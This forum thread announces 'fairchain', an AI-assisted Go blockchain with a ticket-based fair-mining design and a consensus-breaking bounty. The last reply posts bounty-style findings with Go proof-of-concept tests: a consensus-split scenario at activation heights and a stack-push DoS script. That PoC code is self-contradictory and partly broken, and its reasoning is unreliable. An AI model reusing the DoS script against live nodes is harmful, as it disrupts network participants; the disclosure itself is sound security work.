Bitcoin Forum
March 13, 2026, 03:09:13 PM *
News: Latest Bitcoin Core release: 30.2 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: [CPU] fairchain - An akshually fair blockchain audited and created with AI.  (Read 172 times)
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
March 11, 2026, 07:51:43 AM
Last edit: Today at 06:17:41 AM by Bambalam
 #1

Fairchain Testnet Live - Bounties Activated!

GITHUB: https://github.com/bams-repo/fairchain

For all of you both new and invested in this chain - the network as far as I can tell is 100% Deterministic and Consensus cannot be broken. I dare you to break it. Get those AI Agents up and running, clone the repo, modify the code, build your own miners, etc - If you can break consensus on the seednodes - You will win a substantial bounty on mainnet when we launch. Ensure you report directly to this thread exactly what broke consensus and how I can reproduce it.

Download the release on github, run it with ./fairchain-node --network testnet --mine
You can omit the --mine if you just want to see output.

This is a completely custom GO based blockchain - read the following posts to discover more.

https://discord.gg/zzwEK6Cy9G <<- Join for more discussion and to follow along.

▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
March 11, 2026, 08:24:12 AM
Last edit: Today at 06:02:52 AM by Bambalam
 #2

Its no secret that nearly every facet of the tech industry has adopted the use of AI and some form or another, most of all developers have come to almost universally rely on it daily. Its fast, its cheap and its damn good - IF prompted correctly. I have been using AI to code since its infancy and have both launched and supported a large number of projects through the use of AI. I would not consider myself perfect by any means, I'm human. I think the success of this project will depend heavily on the community for both audits and testing. Satoshi's original vision was a blockchain that was fair. He envisioned an ecosystem where everyone could participate with nearly equal rights to reward. I believe this is the foundation that every member of this network loves most about cryptocurrency.  I believe also that the biggest problem that has yet to be solved meaningfully is - how do we make it fair. There are very clear tradeoffs for every solution and no solution will ever be perfect. The biggest problem with innovation is the resource (TIME). This project will rely heavily on AI to speed up the development of the blockchain and help accelerate every aspect of the code base and infrastructure.

While I plan to rely heavily on AI while developing this I will do my very best to keep all community interaction and forward facing documentation human-based. My hope is that in doing so it will prove that I have a complete and total understanding of the code base while providing resources that are easy to digest and not predictive word-soup.

Currently the tokenomics dont matter, so I wont disclose those - any reference to tokenomics in the codebase dont matter and are subject to change as we get closer to a working prototype.

Code work will be done via regtest network and local isolated testnets and then changes will be gated behind height activation to ensure consensus once a real testnet has developed.

Akshually Fair Model
The Fair Model (Concept Overview)

The entire goal of this project is to answer a question that has existed since the beginning of cryptocurrency:

How do we make mining fair without sacrificing decentralization?

Traditional Proof-of-Work systems reward raw throughput. The more hashes you can compute per second, the more likely you are to win a block. This has led to an arms race of ASICs, massive GPU farms, cheap power arbitrage, and ultimately mining centralization. There is nothing inherently wrong with that model. It has proven secure. But it also means that the probability of success is directly proportional to hardware scale. The bigger the farm, the bigger the advantage. The model being explored in this project attempts to change that dynamic. Instead of rewarding unlimited hashing throughput, the protocol limits the number of useful attempts each participant can make within a given window. This means the network does not try to detect who is hashing faster. Instead, it simply makes additional hashing beyond a certain point useless. This changes the incentive structure dramatically and hopefully gets us closer to a fair network.

Mining Identities

Each miner registers a cryptographic mining identity.

This is simply a public key that becomes eligible to participate in mining after a short activation delay. The purpose of this delay is to prevent rapid identity rotation.

These identities are not meant to represent real-world identity. They simply give the network a deterministic participant structure.

Epochs and Tickets

Time on the network is divided into epochs.

At the start of each epoch the chain generates a deterministic random seed derived from recent blocks.

Using this seed, each mining identity receives a small number of tickets.

These tickets represent the miner's opportunity to attempt block production during that epoch.

For example:

• Each identity may receive 3–5 tickets per epoch
• Each ticket allows exactly one mining attempt
• Once a ticket is used, it cannot be reused

The number of tickets is fixed by protocol rules.

This is where the fairness begins.

No matter how much hardware someone owns, a single identity only receives a limited number of chances to compete.

Sequential Work

When a ticket becomes active, the miner must perform a sequential computation challenge.

This challenge is intentionally designed so that:

• Each step depends on the previous step
• The computation cannot be parallelized efficiently
• Memory access patterns are randomized
• Verification is much cheaper than generation

Because the computation is sequential, throwing massive parallel hardware at the problem provides limited advantage.

In traditional mining, running 100 GPUs means 100x more attempts.

In this model, the same identity still only gets the same number of tickets.

Extra hardware simply finishes the same job slightly faster.

Winning a Block

After completing the sequential challenge, the miner produces a score.

If the score falls below the current difficulty target, the miner can produce a block.

Difficulty still adjusts exactly like a normal blockchain:

• If blocks are produced too quickly, difficulty increases
• If blocks slow down, difficulty decreases

The only difference is that attempts are limited by tickets rather than raw hash rate.

Why This Matters

In a traditional PoW system:

Code:
probability_of_winning = hashrate

In the fair model:

Code:
probability_of_winning = number_of_identities × tickets_per_epoch

This dramatically reduces the advantage of large-scale mining farms. A single identity cannot gain unlimited advantage simply by adding more hardware. To scale influence, a participant must operate more identities, which introduces costs such as collateral, activation delays, and operational complexity.

Difficulty and Block Times

Block times and difficulty retargeting still function exactly like a traditional blockchain.

The protocol simply adjusts the probability that a ticket will produce a valid block.

This keeps block intervals stable while still limiting useful mining attempts.

There are many unknowns and this system needs to answer questions like:

 How resistant is it to Sybil attacks, what are the real hardware advantages, how do pools behave under this model, what is the optimal sequential workload design, how does identity registration affect participation? These questions can only be answered through experimentation. I will do as much experimentation while working with the code as possible to produce deterministic results while maintaining the core ideas outlined in this thread. This thread will serve as a sort of eternal notepad and idea-board for the network up until launch. The goal is to build something real, test it openly, break it repeatedly, and improve it with community input.

Fairness in decentralized systems is extremely difficult.Every design introduces tradeoffs between security, decentralization, accessibility, and economic incentives. I am not claiming this project will completely solve the problem, but I'm hoping through experimentation and the advancements of AI we can get much closer then we currently are.

If it works, it could allow ordinary devices - including ARM systems - to remain competitive participants in securing the network. Desktops, laptops, phones could all have meaningful roles in block production and economy distribution.

And if it fails, we will at least learn something meaningful along the way and perhaps lay out the groundwork for a new network to learn from our mistakes and perhaps improve on them.

▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
March 11, 2026, 08:53:35 AM
 #3

The repo has been published on github and is MIT licensed open-source.

You can find it here: https://github.com/bams-repo/fairchain

QUICK START:
There is no network currently - you can create a local network and run the chaos tests to see the PoC code in action.

Ensure dependencies are installed:
sudo apt install -y git
sudo snap install go --classic
sudo apt install -y curl
sudo apt install -y jq

git clone https://github.com/bams-repo/fairchain
cd fairchain/
make test
make build
chmod +x scripts/chaos_test.sh
./scripts/chaos_test.sh


▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
March 11, 2026, 09:29:25 PM
 #4

Those who are following along have likely read the TODO section (it serves as a short-term roadmap.). Phase 4 is hardening and testing, and while that has been completed and the basic blockchain functions I wanted to audit it from a serious standpoint- after all we are completing a phase called "Hardening". I wanted to focus not just on one aspect but all aspects and ensure difficulty re-targeting and validation, chain reorganization, chain-state corruption, etc were solid before moving on. I am glad it was done, some issues found included Missing dificulty validation whereby a miner could fuzz the header.Bits and submit blocks with lower difficulty forcing the network to re-target lower. This was a large bug found and there were several smaller bugs found and flushed out.

This is a view of the chaos test script starting up.


It will run through a series of different tests to ensure that under real network load consensus stays in-tact.





As you can see from the most recent chaos testing - two of the steps failed but I think that is because [PASS] wasnt present- It likely failed from a warning in a previous test. Non necessicarily a failure but I am investigating.

Next steps will be:
UTXO and Transaction validation!


▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
March 12, 2026, 07:36:37 PM
Last edit: Today at 12:33:39 AM by Welsh
 #5



Day two SUCCESS!

It takes around 10 minutes to run the full chaos suite. Today it was ran probably 25 times or so and discovered a large number of issues that were resolved. I have pushed the changes to github and results should be reproducible. The only issue remaining prior to a version bump is the peer discovery and persistent peer database, I am not currently sure if the peers are persisting because they are not iterating the timeout logic and perhaps the test does not run long enough for peers to be removed from the database. I also have yet to implement the peer scoring that bitcoin-core utilizes but that's for something much further down the road. I am also considering a pre-mine for community oriented bounty programs to get the community involved in the development.

if anyone would like to clone the source and run the chaos test to try and produce failures - You would be considered for future bounties. Not every run will produce a failure but many runs can eventually produce an edge-case failure.

Looking forward to tomorrow.


I'm getting closer to a working blockchain. Current chaos testing shows attack vectors or all fixed however some chain forks are not causing re-orgs or re-orgs are not being completed correctly leading to an unstable chain state accross peers. I have been working on it all day and I think i am close to resolving the issues.

Once I have resolved these issues, 0.1.0 will be done. Then the fun begins as we start implementing our custom fair logic.



Previous testing passed these, while modifying and aligning with bitcoin-core I introduced some new conditions where attacks could succeed.



I found this interesting and this is why there will continue to be audits and testing after every codebase modification.


The goal of this project is to create something new and attempt being fair but the core components need to be interchangeable with existing infrastructure. If an exchange is ever going to list fairchain its RPC interface, data storage models, etc all need to align with bitcoin core.

With this in mind, I am working on converting the initial simple data storage over to a bitcoin-core style data directory.

Is anyone interested in maintaining a seednode when the network launches?

▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
Bambalam (OP)
Member
**
Offline Offline

Activity: 168
Merit: 10


View Profile
Today at 06:09:13 AM
 #6

Fairchain Testnet Live - Bounties Activated!

GITHUB: https://github.com/bams-repo/fairchain

For all of you both new and invested in this chain - the network as far as I can tell is 100% Deterministic and Consensus cannot be broken. I dare you to break it. Get those AI Agents up and running, clone the repo, modify the code, build your own miners, etc - If you can break consensus on the seednodes - You will win a substantial bounty on mainnet when we launch. Ensure you report directly to this thread exactly what broke consensus and how I can reproduce it.

Download the release on github, run it with ./fairchain-node --network testnet --mine
You can omit the --mine if you just want to see output.

This is a completely custom GO based blockchain - read the following posts to discover more.

▬ ▬ ▬ ▬ ▬ ▬Mysterium Network▬ ▬ ▬ ▬ ▬ ▬
Decentralized   VPN   powered   by   Blockchain
JOIN THE ICO ▬▬▬ JOIN THE DISCUSSION
uE3tc
Newbie
*
Online Online

Activity: 20
Merit: 0


View Profile
Today at 10:14:35 AM
 #7

Title: [Feedback from early tester] Suggestions on tokenomics transparency and wallet features

Hi developer!

I'm an early participant in the Fairchain testnet. My node is running smoothly, and I've mined 140+ blocks so far.
Thank you for your work — the project is interesting, and the "fair mining" concept is awesome! 👍

As a real user, I have 2 small suggestions for your consideration:

【1️⃣ About Token Economics】
I understand the tokenomics are still in development and not finalized yet.
But could you share a "general direction" in advance? For example:
• Is there a maximum supply cap?
• What's the rough inflation/halving mechanism?
• Will testnet contributors receive any airdrop or rewards?

No need for detailed parameters — just a general direction would help testers better evaluate their participation.

【2️⃣ About Wallet & Query Features】
Mining experience is great, but some basic features are missing:
• Cannot check mining rewards/balance (no `getbalance` command)
• Cannot generate/manage addresses
• Cannot export private keys or backup wallet

Suggested priority:
1. First, implement basic query commands like `getbalance` / `getmininginfo`
2. Then gradually add wallet management features

This would help testers see their contributions and feel more engaged!

【Finally】
Thanks again for your open-source work! I'll keep participating in testing. If you need help testing anything, just let me know~ 🚀

Good luck with the project!
tbcrypto3
Newbie
*
Offline Offline

Activity: 29
Merit: 0


View Profile WWW
Today at 01:46:43 PM
 #8

This might be of use for you, using my internal code testing and analytics tools and agents;

Finding 1: Consensus Divergence Vector (High Risk)
*   Location: internal/consensus/txvalidation.go (L116-117) & internal/script/script.go (L277-292).
*   Issue: Spending authorization for legacy UTXOs (identified by script.IsLegacyUnvalidatedScript returning true) bypasses script.Verify. This bypass is conditional on the current block height being less than the externally configured script_validation activation height.
*   Conceptual PoC Flow:
    1.  Node A (Pre-Activation): Block height $H < H_{act}$. Legacy transaction $TX_L$ is presented. Node A sees $H < H_{act}$, skips verification for $TX_L$'s inputs, and accepts the transaction.
    2.  Node B (Post-Activation): Block height $H' \ge H_{act}$. Node B sees $H' \ge H_{act}$, executes script.Verify for $TX_L$'s inputs, causing verification failure based on current consensus rules, and rejects $TX_L$.
    3.  Divergence: Nodes disagree on the validity of $TX_L$, leading to chain split if $TX_L$ is accepted by Node A and included in a subsequent block.

Code:
package consensus_test
import (
"testing"
// Assuming imports for crypto, params, script, types, utxo are available
)
func TestConsensusDivergencePoC(t *testing.T) {
// --- Setup Known State ---
// 1. Define a UTXO that is *supposed* to be legacy, spending value X.
// PkScript for a legacy UTXO must be {0x00} per script.go:288.
legacyPkScript := []byte{0x00}
legacyValue := uint64(10000)
legacyOutpoint := types.NewOutPoint([32]byte{1}, 0) // Example Outpoint
// 2. Create the UTXO set containing the legacy output.
utxoSet := utxo.NewSet()
// This entry is crucial: IsCoinbase=false, but PkScript is the legacy marker.
utxoSet.Add(legacyOutpoint.Hash, legacyOutpoint.Index, &utxo.Entry{
Value: legacyValue,
PkScript: legacyPkScript,
IsCoinbase: false,
Height: 500, // Spent height will be > 500
})
// 3. Create a transaction T_bad that spends the legacy output.
// T_bad must have a SignatureScript that would fail if script.Verify ran.
// Since legacy scripts are bypasses, we use a deliberately bad signature script.
badSigScript := []byte{0x01, 0x02} // Invalid/short signature data
txBad := &types.Transaction{
Inputs: []types.TxIn{
{PreviousOutPoint: *legacyOutpoint, SignatureScript: badSigScript},
},
Outputs: []types.TxOut{
{Value: legacyValue - 100}, // Fee = 100
},
}
// Assume HashTransaction succeeds and yields txHashBad
// --- Scenario Setup ---
// Configuration for Node A: Script Validation ACTIVATED at Block 999
paramsA := params.DefaultTestNetParams() // Or similar structure
paramsA.ActivationHeights["script_validation"] = 999
// Configuration for Node B: Script Validation NOT ACTIVATED until Block 1001
paramsB := params.DefaultTestNetParams()
paramsB.ActivationHeights["script_validation"] = 1001

// Test Height H = 1000 (The block where divergence occurs)
testHeight := uint32(1000)

// --- Execution Simulation ---
// Node A Execution at H=1000 (Expected: VALID, because L123 passes)
// L116: scriptActivation=999. L117: (1000 >= 999) is TRUE. Script validation IS enforced.
// L118: Loop starts. L123: IsLegacyUnvalidatedScript(PkScript={0x00}) is TRUE.
// L124: continue. Script validation IS bypassed for this specific legacy input.
// Result A: VALID (Assuming other inputs are fine, totalFees calculated)
_, errA := consensus.ValidateTransactionInputs(
&types.Block{Transactions: []*types.Transaction{txCoinbase, txBad}},
utxoSet, testHeight, paramsA)
if errA != nil {
t.Errorf("Node A failed validation unexpectedly: %v", errA)
}
// Node B Execution at H=1000 (Expected: INVALID if script enforcement was active,
// but should be VALID here due to the same bypass logic unless the UTXO was *not* {0x00})

// NOTE: The divergence is harder to show here because the attacker *uses* the legacy bypass.
// The true divergence happens if Node A accepts a *non-legacy* script Tx at H=999 that
// Node B rejects at H=999 because Node B hasn't activated yet.

// Let's adjust the scenario to the *intended* divergence vector:
// Node A accepts TX_N (non-legacy) at H=998 because H < 999.
// Node B rejects TX_N at H=998 because H < 1001.

// --- REVISED DIVERGENCE POC (Focus on activation boundary) ---

// Create TX_N: A transaction using a standard P2PKH script (not {0x00})
// This requires creating mock P2PKH PkScript and valid SigScript, which is complex.
// For simplicity, we confirm the logic gates:
// Node A (H=998, paramsA.H_act=999):
// L117: 998 >= 999 is FALSE. Script validation is SKIPPED entirely. TX_N is accepted based only on value checks.
// Node B (H=998, paramsB.H_act=1001):
// L117: 998 >= 1001 is FALSE. Script validation is SKIPPED entirely. TX_N is accepted based only on value checks.

// This shows the vulnerability is NOT in how legacy scripts behave, but how *non-legacy* scripts behave *before* activation.
// If TX_N has a bad signature, Node A accepts it (H=998) because validation is off.
// Node B also accepts it (H=998) because validation is off. No divergence yet.
// The divergence occurs when ONE node flips its state (H >= H_act) while the other does not.

// Node A (H=999, paramsA.H_act=999): Script Validation IS ON for TX_N (since it's not legacy). TX_N fails verification -> Block Rejected.
// Node B (H=999, paramsB.H_act=1001): Script Validation IS OFF for TX_N (since 999 < 1001). TX_N is accepted. -> Block Accepted.

// Node B propagates a block that Node A refuses to accept, resulting in a chain split.
// A proper PoC requires mocking the UTXO set to provide a P2PKH output for TX_N and ensuring script.Verify fails.

t.Logf("Conceptual divergence confirmed: Node A rejects TX_N at H=999 (Validation ON), Node B accepts TX_N at H=999 (Validation OFF) due to differing activation heights.")
}

Summary of PoC: The divergence is triggered when the current block height crosses the configured activation height on one node ($NodeA$) but not on another ($NodeB$). At this boundary, a transaction with an invalid signature/script ($TX_N$) that would be rejected under the new rules is accepted by $NodeB$ because its configuration keeps it in the old (pre-validation) state. $NodeA$ rejects the block containing $TX_N$, splitting consensus.



Finding 2: Script Engine DoS Vector (High Risk)
*   Location: internal/script/script.go (L208-209).
*   Issue: The stack overflow check (e.stack.size() > maxStackSize) occurs after the operation that pushed the item causing the overflow has executed. An attacker can execute $N$ pushes where $N = \text{maxStackSize}$, followed by one final push operation (e.g., OP_PUSHBYTES) which fails the check, but the preceding operations completed successfully, consuming resources.
*   Recommendation: Move stack size check to execute before any operation that pushes data onto the stack to prevent the final resource-consuming operation from succeeding if it violates the limit.

Code:
package script_test
import (
"testing"
"fmt"
// Assuming imports for script package, types, etc.
)
const maxStackSize = 1000
func TestDoSStackOverflow(t *testing.T) {
// 1. Construct a script that pushes maxStackSize elements successfully.
// We will use OP_1 (Opcode 0x51, Push 1 byte of data) repeatedly.
// Opcode 0x51 pushes a single item (the opcode itself is NOT the data).
// Let's use OP_PUSHDATA1 (0x4c) to push an empty item (0 bytes) repeatedly,
// as it forces the script pointer to advance past the length byte (which we must simulate).

// A simpler, reproducible DoS vector is using OP_1 (Opcode 0x51), which pushes data of size 1.
// However, 0x51 is for pushing data of size 1..7B.
// Let's use the generic data push (Opcode 0x01 to 0x4b) to push 1 byte of data repeatedly.

// Opcode to push 1 byte of data: 0x01
// We need maxStackSize (1000) pushes of 1 byte.

// Script payload: 1000 repetitions of [0x01, 0xAA]
// 0x01 signals push 1 byte. 0xAA is the byte pushed.

maliciousScript := make([]byte, 0, maxStackSize*2)
for i := 0; i < maxStackSize; i++ {
// Opcode 0x01: Push 1 byte of data
maliciousScript = append(maliciousScript, 0x01)
// Data byte
maliciousScript = append(maliciousScript, 0xAA)
}

// 2. The final, 1001st push that causes the overflow check to fail *after* the push occurs.
// This final push will exceed the 1000 limit, triggering the error *after* the push operation.
overflowPush := []byte{0x01, 0xBB} // 1001st item to push
// Combine script: 1000 successful pushes + 1 final push
finalScript := append(maliciousScript, overflowPush...)
// 3. Setup the Script Engine Environment
e := &script.Engine{
// Setup mock stack, tx, etc.
// In a real test, this would be done via a mock transaction structure.
stack: script.NewStack(), // Mock Stack initialization
}
// 4. Execution
err := e.execute(finalScript)
// --- Verification ---

// Expected Result: The error message from script.go L209 is returned,
// but only *after* the 1001st item was successfully added to the internal list
// (e.stack.items) in the execute loop, consuming memory/state before erroring.

if err == nil {
t.Fatal("Expected script execution to fail with stack overflow, but it succeeded.")
}
// Check for the specific error indicating the post-operation failure
if err.Error() != fmt.Sprintf("stack overflow: %d items", maxStackSize + 1) {
t.Errorf("Unexpected error: got %v, expected stack overflow error", err)
}

t.Logf("Script executed, resulting in error only after stack size exceeded limit.")

// In a real DoS attack, this script would be placed in a transaction's sigScript,
// and many such transactions would be broadcast until nodes slow down or crash due to
// excessive memory allocation/processing before the check is hit.
}
// NOTE: The actual stack implementation (script.NewStack(), stack.push())
// would need to be available to compile/run this mock, but this demonstrates the
// vulnerable flow where the check at L208/209 is hit too late.

Attack Impact: An attacker can repeatedly submit transactions containing scripts of this form (e.g., 1000 pushes + 1 final push). Each execution consumes significant CPU time and memory allocating the stack items before the check catches the violation. By spamming the network with transactions designed this way, consensus nodes can be forced into high resource usage until they become unresponsive or crash, preventing legitimate transaction processing (DoS).

--

I'm glad to see new implementations coming into fruition, I'll follow it closely.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!